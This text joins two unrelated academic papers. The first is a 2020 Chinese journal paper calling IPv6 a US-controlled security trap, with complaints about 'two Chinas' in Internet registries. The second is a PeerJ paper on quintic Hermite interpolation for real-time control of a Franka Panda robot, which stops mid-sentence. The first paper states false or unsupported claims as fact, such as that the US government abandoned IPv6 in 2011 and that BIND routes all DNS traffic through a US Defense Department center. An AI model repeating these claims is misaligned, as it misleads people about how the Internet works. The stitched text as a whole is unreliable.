E-mail: mcjzp139@139.com Guo Xiaohui Henan Vocational College of Agriculture Zhengzhou, 451450, China, E-mail: mcjzp139@139.com Abstract—Since China's public network got access to the Internet in 1994, the study, research and understanding of the Internet have been blindly superstitious to the United States for a long time, copying the rules and regulations of the United States, and the textbooks in the field of Internet and information are almost completely Americanized. For more than 20 years, we have not formed our own systematic and profound research and practical views on the Internet, most of which are based on the half understood, ignorant, and parrot- like knowledge and cognition instilled from the United States. Being controlled by others in ideology is even worse than in technology. At present, China's understanding of the Internet is very superficial from the superior to inferior. We failed to firmly grasp the technology controlled by others and legal key points. We didn’t adhere to independent innovation, which resulted in that we were repeatedly passive or even long-term passiveness in cyberspace strategies and tactics. This paper will start from the history and technical characteristics of the emergence of the Internet, comprehensively discuss the problems that have existed since the emergence of the Internet more than 20 years ago, and reflect on the future development of the international network, making the Internet a truly open and shared international network. Keywords-Network; Internet; Future Network I. INTRODUCTION The computer network refers to the computer system which can provide transmission, storage, analysis and sharing of data for the purpose of acquiring and mastering data. It serves for the needs of communication with others. Two or more computer networks with communication protocol, transmission channel and infrastructure interoperability constitute a computer network interconnection and interworking system that connects and shares data. Strictly speaking, it can be called interconnected network. Future Network or an international network system consists of all ubiquitous networks connected, interacting and sharing different carriers, sources, function-matching and operating purposes, whether wired or wireless, ground or space. The current Internet is just a computer network using a single TCP/IP communication protocol, not two or more interconnected networks. It is not the interconnection or internet by the exact definition, so it can’t be called an interconnected net, or rather it may be called a computer connected system. If the origin is wrong, everything is wrong. This is especially true of our understanding of interconnected Networks. What is the Network? What is the interconnected Network? What is the Future Network? What is the different or relationship between IPv4, IPv6 or even IPv9? What are the fundamental drawbacks of Internet architecture and principles? Do we have safe, credible and effective response plans and coordination measures for the newly-emerging problems, new things, new technologies and new spaces in the process of intelligent network development? We all need to advance with the times to re-understand, redefine, re- explore and re-study it. We need to take the opportunity to seriously correct the deviation and mistakes in cognition and knowledge, and let the network users, the people across the country and our future generations know the facts in a practical way. II. ARCHITECTURE OF THE INTERNET It is generally believed that the American Internet, which adopts IPv4 technical protocol, has entered the post IPv4 era due to the lack of address design. At present, renting IPv4 address and adopting IPv4 technical protocol constitute the Internet of various mailto:mcjzp139@139.com mailto:mcjzp139@139.com International Journal of Advanced Network, Monitoring and Controls Volume 05, No.01, 2020 62 countries, which is still the mainstream of computer network. The U.S. military says its IPv4 address can be used until the end of 2029. In recent years, the United States has continued to assign IPv4 addresses to the United States and other countries around the world, excluding China. IPv6 protocol is designed to solve the problem of IPv4 address shortage. It can provide 2 128 address scale, and that's all. The application and resolution of IPv6 address is still based on the network architecture of IPv4, that is, the original, traditional and irreversible design architecture of the Internet and the tree network architecture (IPv4) continuously improved, strengthened and tightly controlled by the U.S. government and military. It is inevitable that IPv6 can't interoperate with IPv4 in technology, which is bound to lead to the confusion of network architecture and operation. Therefore, IPv6 special network architecture has to be rebuilt to replace IPv4 network architecture (involving almost all the network software and hardware of infrastructure), which constitutes a "subversion" of the Internet based on IPv4 in fact. After more than ten years of transitional practice, the United States has found that the cost of rebuilding IPv6 network is too large, there are too many security traps, and the technical agreement is not mature. Besides, "subverting" IPv4 has brought about a series of extremely serious problems in economy, society and military. In fact, the U.S. military and government have abandoned IPv6 transition plans since 2011. In 2017, the adoption rate of IPv6 in the United States dropped from the first in the world to the third. On July 14, 2017, the Internet Engineering Task Force (IETF) of the United States issued RFC 8200, which announced the latest standard (STD 86) of the sixth edition of Internet Protocol (IPv6). At the same time, it abandoned the RFC 2460 (IPv6 draft) proposed in December 1998, and deleted the "next generation Internet Protocol IPng" which was in transition to IPv6. Over the past few years, the widespread introduction of new data protection regulations around the world is having a dramatic impact on technology companies and consumers around the world, resulting in some previously established best practices in IETF procedures and regulatory requirements becoming undesirable, the U.S. Internet regional working group (IntArea) said. Please note that the U.S. Internet Engineering Task Force issued the official document RFC 8179 (BCP 79) in May 2017, namely, "intellectual property issues in IETF technology", which provide three basic principles for IETF to deal with Internet intellectual property claims (discarding RFC 3979 and RFC 4879 simultaneously): 1) The IETF will not determine the validity of any specific intellectual property claim. 2) In following the normal practice? The IETF can decide to use technology that has been exposed as intellectual property if necessary. 3) All participants in the IETF working group discussions must disclose known intellectual property rights or any intellectual property rights covered and likely to be covered under discussion and their recommenders. This requirement applies to all IP claimants, their employers, sponsors, or agents of IP claimants, without the need for patent searches. In this way, IETF tends to choose technologies with undeclared intellectual property rights, or technologies with free intellectual property rights; IETF may adopt technologies at its discretion, or not commit to licensing; and IETF specifications do not stipulate mandatory security technologies. Therefore, IETF does not define the internal or external problems of the main patent technologies for IPv6. So what's the practical significance of saying that China has more than 100 IPv6 intellectual property rights? After all we are still subject to the United States and IETF! III. THE PROBLEM OF IPV6 Practice has proved that many IPv6 Security traps occur and appear when IPv6 cannot interoperate with IPv4, or when IPv6 is trying to run with the network architecture of IPv4 technical protocol. Once they happen, they will not go away, just like opening Pandora's box (security trap or temptation) of network security. For example: The design of interface ID in IPv6 address will lead to the mandatory real name system for ordinary users in disguise. Because IPv6 also stipulates that interface ID can be allocated in other ways, even random number and manual way, the experts of IPv6 like hackers can easily hide their physical address. This state is no more insecure than IPv4, but an astonishing security scandal once it is widely known, easily operated and arbitrarily adopted by ordinary users who have no knowledge of IPv6. The gateway tunneling International Journal of Advanced Network, Monitoring and Controls Volume 05, No.01, 2020 63 may also help hackers or spies of hostile camps hide their whereabouts, making hackers more difficult to find, or causing greater national strategic security problems. Network address and addressing mode of IPv6, data routing and exchange are real end-to-end, and there is no need for network address translation (NAT). At the same time, the network identification of user equipment is directly exposed, which can be easily collected and used. Through the cross aggregation and correlation analysis of multi-source and multi-element identification data, it is easy for humans and machines to be bound permanently, and thus beyond the current "precise push" (advertising) ability, deriving "precise tracking", "precise positioning", "precise strike", etc., with great potential security risks. IPv6 is applied to smart home, smart community, big data, cloud computing, etc. It may be "accurate" to the details of a family, a family member or the staff in the same office, etc., which is extremely dangerous. On the one hand, almost all servers of well-known websites are hosted abroad. For example, Netease e- mail server is hosted on Amazon's cloud service platform (AWS). At least the IP address belongs to Amazon. The risk and consequences of domain name and address being controlled are obvious. It is simply to hand over hundreds of millions of Netease users to the U.S. Central Intelligence Agency and its intelligence system (IC) members for all-round, all- view and all-time monitoring and supervision. Amazon has publicly announced the provision of cloud services to the CIA and its members of the intelligence system (IC), which is known as the "Amazon cloud service platform secret zone" (AWS, Amazon Web services). Amazon called the service "the first and only commercial cloud provider to provide comprehensive data classification services to the government, including non-secret, sensitive, classified and top secret data." On the other hand, BIND, the system software of DNS server, has become the standard of implicit monopoly. Almost all users in the world do not know the truth (the relevant national authorities and scientific research institutions have never issued a warning, nor have guided users taken any preventive and governance measures), that is, the United States has long been on all DNS servers (IPv4 and IPv6) on the Internet, solidified the necessary route to the network information center of the United States Department of defense first. No matter what users are who, whether like it or not, all data and information exchanges must unconditionally comply with the security principles and measures of "American interests first". The Great Wall firewall is invalid for IPv6. At present, IPv6 network in Colleges and Universities can easily log in the "forbidden network" of foreign countries (websites of religion, terror, anti-propaganda, etc.). Another reason why IPv6 is not suitable to replace IPv4 is the conflict about IPv6 on the Internet backbone network, which leads to the congestion of network flow. At present, there is no reliable technical solution. The overall comparison of IPv4 and IPv6 in the case of a single failure shows that in 86% countries, IPv4 connection is more reliable. An important discovery in IPv6 field is that many ISPs do not have correct network connection under normal operation conditions. For example, in the United States, only about 10% of autonomous systems (AS) support IPv6, while in China, China Telecom (AS 4134) only gets global connectivity through one service provider, hurricane electric (HE), which is in worse condition. Technically speaking, China's public network has fallen into the hands of others, the above-mentioned major IPv6 Security Risks (pitfalls, temptations and solidified routes, etc.) are not completely solved, and state organs and special departments, as well as important sensitive industries involving the national economy and people's livelihood, dare not use them. If it is used, the consequences will be unpredictable. The principles, systems, and strategies that US internet is dominated and controlled by the US military remain unchanged. The U.S. military has established and improved a network operation system with strict command and coordination from the top down, especially in the field of cyberspace, which is strictly regulated by the U.S. military. However, it is difficult for China to make a firm response to network operations in the first time, and to organize a high-speed, high-efficiency and high- intensity anti reaction capability of the military civilian joint network operation system in the first time. The current supervision, command and coordination system and framework of cyberspace in China are neither suitable for the perception situation of the Internet in the United States, which has completed and improved the preparations for launching cyber war at any time in terms of technology and law, nor for the needs of accelerating the construction of cyber power and effectively responding to the United States' overall containment of China in cyberspace. International Journal of Advanced Network, Monitoring and Controls Volume 05, No.01, 2020 64 IV. "TWO CHINA" ON THE INTERNET ICANN is suspected of deliberately manufacturing "two Chinas" on the Internet for a long time, deliberately setting the technical conditions and basis of "two Chinas" that can cause network information confusion, and deliberately restraining, containing and interfering with China's autonomous and controllable development of sovereign and secure networks. According to the regulations of internet name and digital address distribution agency in the United States, some IP addresses are assigned to the five regional Internet registries (RIR) in the world, and then the five regional Internet registries are respectively responsible for the registration services in the region. IP address and AS number assignment for Asia Pacific countries are managed by the Asia Pacific Network Information Center (APNIC), which is established in Australia. Under the five regional Internet registries, RIR is divided into national registration agency NIR and regional registration agency LIR. The U.S. Internet name and digital address distribution agency divides the Asia Pacific region into 56 economies (countries and regions). The Asia Pacific Network Information Center has seven core members (national registration agencies) who can enjoy special preferential conditions, including China, Japan, South Korea, Vietnam, India, Indonesia, and even Taiwan. According to the official website of Taiwan Internet Information Center (TWNIC), founded in December 1999, its original competent department was the Ministry of Transport of Taiwan Authorities. In December 2017, it was changed into the National Communication and Broadcast Commission and became the national network information center. In December 1999, it was at a time when Lee Teng Hui publicly supported Chen Shui Bian's campaign for "President" and Taiwan's independence was more active. On May 20, 2000, a gun shot put Chen Shui Bian on the throne of "President". Since then, in the "Internet" activities held around the world, Taiwan's "national flag of the Republic of China" has been put in the venue; Taiwan's representatives of TWNIC, the "national registration agency", enjoy the same treatment as those of CNNIC (China Internet Network Information Center) of the People’s Republic of China. China has clearly declared the principle of "one China" sovereignty in international organizations, but why is the Internet an exception? Why should we tolerate the emergence of "two Chinas" on the Internet many years after China's full-featured access to the Internet in 1994? It concerns the geopolitical issues of Internet governance, the logical, physical and perceptual boundaries of Internet monitoring, and the fact that Taiwan can easily control China's data sovereignty and open-source information by using domain name rotation, data "transgenic" technology and other technologies. It concerns the sovereignty principle and security bottom line of China's cyberspace. This is not a simple technical issue, but a general political issue. China's “Anti-Segregation Law”, issued in 2005, clearly declared that there is only one China in the world, the mainland and Taiwan belong to one China, and China's sovereignty and territorial integrity are inseparable. The state will never allow the "Taiwan independence" secessionist forces to separate Taiwan from China in any name or in any way. The fact that the "Taiwan independence" secessionist forces split China in any name or in any way, the state may take non peaceful means and other necessary measures to safeguard its sovereignty and territorial integrity. Any negligence on the sovereignty and security of cyberspace data (no matter professional or amateur) may lead to irreparable loss or disaster of cyberspace sovereignty and security (national sovereignty and security) at any time. How can one tolerate others encroaching on one's preserve? V. SUGGESTION Firstly, re-understand the Internet and deepen the governance of the Interconnected Network. Based on a wide range of opinions, we should open up and conduct large-scale discussions on the deployment of IPv6, practically adjust our strategies and tactics in the field of cyberspace information, correctly guide and promote the construction and development of China’s sovereign network, future network, and the global community of destiny in cyberspace. Secondly, re-consider the e-government extranet, comprehensive website and network infrastructure security, design and implement China's autonomous and controllable cyberspace security monitoring system. Thirdly, thoroughly eliminate and eradicate the adverse effects, political weaknesses and technological constraints of "two Chinas" on the Internet. About the authors Mou Chengjin, the director of the international strategy research center of China Mobile Communications Federation. The paper version was International Journal of Advanced Network, Monitoring and Controls Volume 05, No.01, 2020 65 firstly published in Chinese on December 12, 2018, revised in January 2020. If the Chinese version was needed, please contact the author. Email: mcjzp139@139.com . Guo Xiaohui, associate professor of Henan Vocational College of Agriculture. Email: guoxiaohui@hnca.edu.cn work_qn7zm7yw3jaupivakvizv4usz4 ---- Submitted 16 July 2020 Accepted 29 September 2020 Published 2 November 2020 Corresponding author Morten Lind, morten.lind@sintef.no Academic editor Marcin Woźniak Additional Information and Declarations can be found on page 12 DOI 10.7717/peerj-cs.304 Copyright 2020 Lind Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Real-time quintic Hermite interpolation for robot trajectory execution Morten Lind Production Technology, SINTEF Manufacturing, Trondheim, Trøndelag, Norway ABSTRACT This paper presents a real-time joint trajectory interpolation system for the purpose of frequency scaling the low cycle time of a robot controller, allowing a Python application to real-time control the robot at a moderate cycle time. Interpolation is based on quintic Hermite piece-wise splines. The splines are calculated in real-time, in a piecewise manner between the high-level, long cycle time trajectory points, while sampling of these splines at an appropriate, shorter cycle time for the real-time requirement of the lower-level system. The principle is usable in general, and the specific implementation presented is for control of the Panda robot from Franka Emika. Tracking delay analysis is presented based on a cosine trajectory. A simple test application has been implemented, demonstrating real-time feeding of a pre-calculated trajectory for cutting with a knife. Estimated forces on the robot wrist are recorded during cutting and presented in the paper. Subjects Real-Time and Embedded Systems, Robotics Keywords Interpolation, Robotics, Real-time, Python, Joint control, Trajectory INTRODUCTION Reacting instantaneously to perceived changes in the environment is an important feature of modern robotics, recently for safe human-robot cooperation, but also more traditionally for force-based control and visual servoing applications. The setup for this includes a sensor system for perceiving the environment, a control model for deciding how to react, and a control interface to the mechanical system. This must all be real-time integrated into a sensor-based robot control application. A real-time interface to the robot arm, through the robot controller, is a necessity. Newer robot controllers are getting increasingly open towards real-time trajectory feeding. An early example of a supported mechanism was realized in the KUKA controllers with the Robot Sensor Interface (RSI) software package, which used a cycle time of 12 ms in version 2 and 4 ms in version 3; version 3 maintained the legacy 12 ms cycle time as an option. Results were presented by Lind, Schrimpf & Ulleberg (2010). The Universal Robots controllers can be controlled in various, official ways through the standard controller process. Methods and results are reported by Andersen (2015). Older versions of the Universal Robots controllers provided an unofficial C API, with very low tracking delay, as presented by Lind, Schrimpf & Ulleberg (2010). More accurate methods for measuring and classifying types of delays was presented by Andersen et al. (2015). How to cite this article Lind M. 2020. Real-time quintic Hermite interpolation for robot trajectory execution. PeerJ Comput. Sci. 6:e304 http://doi.org/10.7717/peerj-cs.304 https://peerj.com/computer-science mailto:morten.lind@sintef.no https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.304 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://doi.org/10.7717/peerj-cs.304 Besides standard interfaces to robot controllers, some controllers can be hacked for gaining access at the lower controller levels. Kröger & Wahl (2010) directly accessed the frequency inverters of a Stäubli RX60 controller and was able to perform servo-level control in 10 kHZ. Schrimpf (2013) injected a single-board computer in the USB-link between the higher and lower level controller components in a Nachi AX10 controller, enabling joint-level control in 100 Hz. Developing sensor-based, real-time robot control applications is challenging. More so when the target programming platforms, in general, are exclusively available in compiled languages such as C++. For those situations where the real-time performance is not too critical, also called soft real-time requirements, it will increase the development efficiency, if a higher level, general programming language, such as Python, can work as the target platform. The main motivation for the presented work is to enable such a high level, general, soft real-time programming platform, in this case Python, for developing advanced control application; such as the DeepMPC framework for cutting of food products described by Lenz, Knepper & Saxena (2015) and the real-time grasping control described by Morrison, Leitner & Corke (2018). From experiments and experience, a pure Python-based framework, exploiting NumPy for numerical calculations, manages to calculate kinematics for a typical industrial robot system with six to nine joints in 10 ms, with room for also doing some sensor processing and general data accounting, using a contemporary PC (Lind, Tingelstad & Schrimpf, 2012). This calculation time strongly depends on the amount for sensor processing and data accounting, and on the computing power on the CPU and computer system on which the software is deployed. On a modern, high-end PC of today the results presented by Lind, Tingelstad & Schrimpf (2012) may well be possible with a 5 ms cycle time. Due to the ‘‘Global Interpreter Lock’’ in the Python interpreter, multi-threading in a single Python process is not utilizing the multiple cores of modern CPUs, and computationally heavy applications should be distributed over several processes. Eggen & Eggen (2019) presents experiments and results aimed at determining when it is advantageous to process-distribute a Python application. Schrimpf, Lind & Mathisen (2013) presented a time analysis for various data paths in a distributed, real-time, sensor-based robot application implemented and deployed with Python and ROS. The seven-axis Panda robot from Franka Emika can be controlled in real-time through an Ethernet UDP connection. The real-time control interface requires a cycle time of 1 ms. Several other robot controllers provide real-time interfaces for trajectory feeding at rates higher than 100 Hz. Mihelj et al. (2012) mentions official and research interfaces for real-time control through available controllers for KUKA, Stäubli, Yaskawa Motoman, and Comau robots. These examples may indicate a slow but general tendency for such joint-level, low-latency interfaces to become of more general availability among robot controllers in the future. The cycle time requirement of 1 ms of the Franka controller, and even the 4 ms interface to newer KUKA controllers with RSI version 3, poses a computational and real-time challenge for Python-based real-time trajectory feeding application. It is a computation time challenge, since pure Python computations in general is slower than C++ code by an Lind (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.304 2/13 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.304 order of magnitude or more. This, however, is mitigated somewhat when using efficient scientific computation packages such as NumPy and SciPy. It is a real-time challenge, since the wake-up latency on the PC gets an additional contribution through the Python interpreter. This paper shortly sketches a prototype solution addressing these challenges by presenting a joint-level intermediary motion service over Ethernet that respects the 1 ms real-time obligation towards the Franka controller, while providing an interface to the Python motion application requiring a more moderate cycle time; e.g., 10 ms. The motion service requires a cyclic real-time response from the motion application while obeying the similar requirement from the Franka controller. This allows for the motion application to make instantaneous changes and correction to the generated trajectory it emits. A positive side effect of this motion service is that it is re-connectable, since it detects the disconnection from, or a failure to comply in, the Python application, whereby it takes over the real-time obligation towards the Franka controller; and thus the low-level control loop is maintained. The implementation of the presented solution is based on piece-wise quintic Hermite splines with an option to limit velocity, acceleration and jerk. The current implementation was developed for being fed a position trajectory from the motion application. However, velocities and accelerations are derived over the position trajectory and used in the interpolation, and can also be fed from the motion application. The presented solution can be classified as Type V in the scheme by Kröger & Wahl (2010). The choice of piece-wise Hermite spline as the fundamental computational object for trajectory representation was made due to its adequate parameterization and domain: Piece-wise Hermite splines are parameterized by clamping the direct motion quantities, such as position, velocity, acceleration, and jerk, at the end-points of each segment. SYSTEM AND METHODS The minimal system that have been set up for experimentation and testing is based on the seven-axis Panda robot from Franka Emika (https://franka.de/). An intermediate motion service is performing the interpolation from a lower frequency loop to the required rate of the high frequency loop for positions, and optionally velocities and accelerations, for all joints. A motion application may then connect to the low-frequency interface of this motion service, and thus control the robot arm in a moderate real-time frequency. This section gives an overview of the active entities in the experiment system and the Hermite spline calculus. The Panda Robot and the Franka Controller At the lowest level the robot arm servos are controlled via a proprietary interface by the ‘‘Franka Controller’’ (FC). The ‘‘Franka Control Interface’’ (https://frankaemika.github. io/docs/libfranka.html) (FCI) is a software addon for the FC which enables real-time trajectory feeding, synchronized with reading the state of the robot; including joint torques and estimated external forces. Lind (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.304 3/13 https://peerj.com https://franka.de/ https://frankaemika.github.io/docs/libfranka.html https://frankaemika.github.io/docs/libfranka.html http://dx.doi.org/10.7717/peerj-cs.304 Figure 1 Interaction and sequence diagrams for the proposed system. (A) Rough structure of processes and entities with their connections. [Image credit: Morten Lind, 2020]. (B) Sequence diagram for the syn- chronization among the three threads in MS, the FA and the MA. Image credit: Morten Lind, 2020. Full-size DOI: 10.7717/peerjcs.304/fig-1 When the FCI is installed on the FC, the freely available C++ library ‘‘libfranka’’(https: //github.com/frankaemika/libfranka) can be used to operate the robot arm at a cycle time of 1 ms. The mechanism is to hand a callback function to libfranka when starting the control loop. This callback is then invoked every 1 ms with the status of the robot arm, expecting to be returned within less than one cycle. This cycle time is dubbed the micro cycle time. In Figure 1A FC is modelled as a process controlling the Panda arm, running on the Franka Controller PC, i.e., it is born with its own node. The FCI is exposed over an Ethernet UDP socket, on an IP address configured in the FC. Thus the trajectory feeding is performed from a different node; e.g., a user-supplied PC. libfranka provides various methods of control, ranging from operation (Cartesian) space control of the tool flange to joint torque control. This paper does not go into detail with libfranka and the presented work only uses the joint position control mode. Lind (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.304 4/13 https://peerj.com https://doi.org/10.7717/peerjcs.304/fig-1 https://github.com/frankaemika/libfranka https://github.com/frankaemika/libfranka http://dx.doi.org/10.7717/peerj-cs.304 Motion service and application For the purpose of obeying the micro cycle real-time requirement the ‘‘Motion Service’’ (MS) has been developed and implemented. As illustrated in Fig. 1A, MS links with libfranka for setting up the callback communicating with the FC over FCI, and starting the control loop. The MS is running in its own process, on its own node, separate from the FC. The ‘‘Motion Application’’ (MA) process may run on the same computational node as MS. For connection responsiveness, it is better to have the MS and the MA run on the same node. However, for dedicating more computing power to the MA, leaving more computational resources for sensor analysis and control algorithms, it could be running on a dedicated node. The presented architecture, where the MS is exposing its interface via an Ethernet UDP socket, is flexible in this regard. Figure 1A illustrates how an optional force-torque sensor may be added. Such a force- torque sensor would typically be mechanically mounted between the wrist of the robot arm and the robot tool for measuring the wrench, W , on the tool. A force-torque sensor is not used in the presented setup and experiments. Instead the estimated wrench, Ŵ from the robot dynamics is used. This estimate is obtained as a feature from libfranka and provided by the MS to the MA. Software mechanisms For understanding the general workings of the MS, this section gives a brief overview of the central mechanistic design. Figure 1B shows a sequence diagram illustrating the central, operative synchronization and responsibility of the three threads of the MS code. In addition the network-remote entities FC and MA are modelled as threads with remote message interaction to the MS threads. In addition to this central, operative interaction the connection thread in the MS has a complex logic for maintaining control of the connection from an MA. This will not be treated here. Even though the connection management, which enables the FC-MS interaction to be kept alive over repeated MA-sessions, the main focus of this paper is to describe the interpolation in the MS. Also not illustrated in Fig. 1B is the setup and initialization procedures of the MS, which establishes the real-time loop with the FC and prepares for receiving connections from an MA. Like the connection maintenance, this is also important, but the details are not in the focus of this paper. A micro cycle is initiated by the callback from the FC to the Responder thread in the MS, conveying the robot arm status. The Responder thread is only responsible for conveying this trigger and status data to the Updater thread, and for returning the prepared next micro setpoint to the FC obtained from the Updater thread in response. Upon receiving the new micro state and returning the next micro setpoint, Updater thread is triggering itself to calculate the micro setpoint for the next micro cycle. When the Updater thread is triggered to prepare the micro setpoint for the next micro cycle, it first updates its micro and macro cycle accounting, which determines whether a Lind (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.304 5/13 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.304 new macro cycle is to be started. The current macro cycle is valid for the next micro cycle if the current spline domain is valid for the time of the next micro cycle. In that case, the current spline is used to prepare the next micro setpoint. If a new macro cycle is to be started, the Updater triggers the Connection thread, and the next macro setpoint is retrieved from it. If a valid new macro pose is retrieved, a new spline based on this is set up, and used for micro setpoint calculation. If not, due to late response or disconnect from the MA, a braking spline is generated. The severity of this braking spline depends on whether the missing macro setpoint was due to lateness or a broken connection. In the former case, only light braking will be generated, since it is expected that the MA will resume its responsiveness. In the latter case full deceleration braking is generated since the robot arm then must come to a full stop as fast as possible. The Connection thread is, during operation in an MA-session, responsible for the interaction with the MA. It is triggered by the Updater thread when a new macro cycle is started, which it propagates on to the MA. After triggering the MA, it expects to receive a new macro setpoint some time later, before the end of the newly started macro cycle. When a macro setpoint is received from the MA, a flag is set to tell that a new macro setpoint is received. This flag is checked by the Updater thread, and is used to determine, if the MA was within its deadline. The Updater clears the flag, preparing it for receiving the next macro setpoint from the MA. Timing-wise, when the macro cycle is between macro setpoint i and i+1, a received macro setpoint is stored for use as the i+3’th macro setpoint; i.e., one extra macro setpoint in the stream is retained. This delay is introduced to be able to correctly estimation the acceleration to target when splining toward i+2, calculated using the central acceleration estimator over the macro setpoints i+1, i+2, and i+3. The same principle is used for the velocity at macro setpoint i+2, which results in the average velocity on the segments i+1→ i+2 and i+2→ i+3. The calculus of motion quantities at the macro trajectory points is based on the stream of joint positions received from the MA, which are assumed to arrive at regular times separated by the macro cycle time, δtmac. This stream of macro joint position vectors, {pi}i, is the fundamental input data from the MA to the MS. Over these, the central discrete estimators of velocities and accelerations may be concisely expressed as p(1)i+2=0.5 [ pi+2−pi+1 δtmac + pi+3−pi+2 δtmac ] (1) p(2)i+2= pi+3−2pi+2+pi+1 δt2mac (2) These estimated first and second derivatives of the macro joint trajectory are used for calculating the splines, which are then sampled to generate the micro trajectory positions. Hermite splines Hermite spline and Hermite interpolation are named in honour of the 19th century French mathematician Charles Hermite. General treatment on multi-node Hermite splines of arbitrary order may be found in several publications and textbooks. E.g., Spitzbart (1960) Lind (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.304 6/13 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.304 focused on a general formulation for arbitrary order, while Krogh (1970) focused on efficient computation of interpolation and numerical differentiation with continuous derivative. However, course notes by Finn (2004) introduces an elegant formulation for the basis polynomials for cubic and quintic Hermite interpolation. Both have been implemented in the MS. The formalism can be concisely written, with the same enumeration of the basis functions, as p̃n(u)= (n−1)/2∑ i=0 p(i)0 H n i (u)+p (i) 1 H n n−i(u) for u∈[0;1] (3) In Eq. (3) we assume an underlying trajectory p(u) of which we know p(i)τ =p (i)(τ) for i∈{0..n−1} and τ ∈{0,1}, where p(i) is the i’th derivative of p. The basis functions for Hermite interpolation to order n are denoted {Hni }i∈{0..n}. For cubic (n=3) and quintic (n=5) Hermite interpolation the basis functions can be found listed in Finn (2004). For completenes the coefficients are listed in matrix notation in Eqs. (4) and (5). H3=   1 0 −3 2 0 1 −2 1 0 0 −1 1 0 0 3 −2   (4) H5=   1 0 0 −10 15 −6 0 1 0 −6 8 −3 0 0 1 2 − 3 2 3 2 − 1 2 0 0 0 1 2 −1 1 2 0 0 0 −4 7 −3 0 0 0 10 −15 6   (5) In an online or real-time system a change of variable is necessary for Eq. (3) to be applicable. When the system at run-time establishes a new interpolation segment it takes the form[t0;t1]withδtmac= t1−t0. Introducing the substitution on the interval u(t)= t−t0 δtmac , and letting p(i)τ =p (i)(τ) for i∈{0..n−1} and τ ∈{t0,t1}, the directly applicable version of Eq. (3) is p̃n(t)= (n−1)/2∑ i=0 (δtmac) i ( p(i)t0 H n i (u(t))+p (i) t1 Hnn−i(u(t)) ) for t ∈[t0;t1] (6) Equation (6) has been implemented in the MS code base for both cubic and quintic Hermite splines, and can be used based on joint velocities and accelerations from the macroscopic trajectory which is fed from the MA. It is noteworthy that a piece-wise cubic Hermite spline is a C1-smooth function and a piece-wise quintic Hermite spline is a C2-smooth function. With respect to generating motion trajectories, the great difference between these is the jerk; the third derivative of the position trajectory. Many motion controllers require being fed a limited-jerk trajectory, which is fulfilled by a C2-trajectory, whereas a C1-trajectory exhibits infinite jerk. Lind (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.304 7/13 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.304 EXPERIMENTS AND RESULTS During development a cosine position trajectory generator have been used extensively. This section presents some results from such cosine trajectories. A cosine trajectory is used for testing, since it starts at zero speed, is cyclic, and is infinitely smooth (C∞). In addition to the testing by a cosine position trajectory, preliminary experiments have been performed using the force-torque estimation from the FC with a Python-based framework, aimed at integrating force-feedback in a knife-cutting application. The cutting experiment does not utilize the real-time possibility of the Motion Service, but only serves to demonstrate its soundness from a simple application perspective. Cosine joint motion A simple cosine motion is generated and the motion of a single joint is observed. This will first and foremost give insight into the tracking delay in the system. The presented results defines the tracking delay from the MC perspective as the time passed from receiving a macro setpoint from the MA until a status packet from the FC shows that the joint position have been achieved. Figure 2B show a selected time range for the position trajectory of the moving joint. The time range have been selected to easily inspect the delays from the MA over the ‘‘Franka MS’’ (FMS), and to the report back from the FC. The observed delay between the MA and the FMS is approximately 20 ms with the delay from the FMS to the reported FC position is another approximate 20 ms. In total, for the trajectory execution we can estimate a 40 ms delay. It is evident that there is an inherent tracking delay of approximately 20 ms in the FC. This is affected by various filters and compliance parameters which are set at the initialization of the control loop through the FCI. Thus a lower inherent tracking delay may possible with more tight control parameters. Particularly the experiments presented here have been using a value of 10.0 Hz for the parameter cutoff_frequency in libfranka. This parameter controls, according to the documentation of libfranka, a first order low-pass filter. The reason for choosing a low cutoff frequency is observable as a ‘‘blackout’’ of two to three micro cycles near t =3.185s in Fig. 2. Such blackouts occurs generally every second, but not regularly. The reason for these blackouts have not been clarified, but they probably arise from running the system on a full desktop PC; i.e., there have been no stripping of services or other running processes on the PC to increase the real-time responsiveness. Execution of a simple cosine motion in one joint also allows the observation of the difference between using cubic and quintic Hermite splines. To this end, classes have been implemented in the FMS code base for both of these. Figure 3 shows accelerations obtained by discrete derivation of the MA and FMS trajectories for the observed joint. Figure 3A shows the acceleration in a trajectory in a session where the FMS runs with cubic Hermite interpolation and Fig. 3B shows the same type of cosine trajectory from a session using quintic Hermite interpolation. The cubic Hermite interpolation acceleration curve in Fig. 3A is clearly discontinuous, which is consistent with its C1-property. Correspondingly the quintic Hermite interpolation acceleration curve in Fig. 3B is clearly continuous, which is consistent with its C2-property. Lind (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.304 8/13 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.304 Figure 2 A selected time range of the positions in a cosine trajectory. Image credit: Morten Lind, 2020. Full-size DOI: 10.7717/peerjcs.304/fig-2 Figure 3 Comparison of accelerations in the generated trajectories from a cosine motion using cubic and quintic Hermite interpolation. (A) Acceleration for cubic interpolation. Image credit: Morten Lind, 2020. (B) Acceleration for quintic interpolation. Image credit: Morten Lind, 2020. Full-size DOI: 10.7717/peerjcs.304/fig-3 Simple cutting A simple application for a cutting experiment has been set up. This is an application where the robot tool is a knife and the task is to cut through a presented object. By simple cutting is meant moving the tool according to a pre-calculated trajectory; in contrast to sensor-based adaptive cutting where sensor input is used in the motion generation loop. The application in this experiment does not exploit the ability to make real-time generation of, or corrections to, the commanded trajectory. The purpose of the experiment is to do a simple demonstration of the robustness of the MS implementation and to get an indication of the reliability and stability of the wrist wrench estimation obtained from libfranka. The minimalistic setup used in the experiment is illustrated in Fig. 4. Figure 4A shows a photo of the knife held in the robot gripper and a test object; in this case a stick of EPS strapped to a bracket. Figure 4B illustrates the geometric setup of the knife. The knife shaft is held clamped in the gripper, and thus defines the commanded knife directions for cutting ĉc, which is perpendicular to the edge, and shearing ŝc, which is parallel to the edge. The actual cutting and shearing directions are defined by the knife edge at the 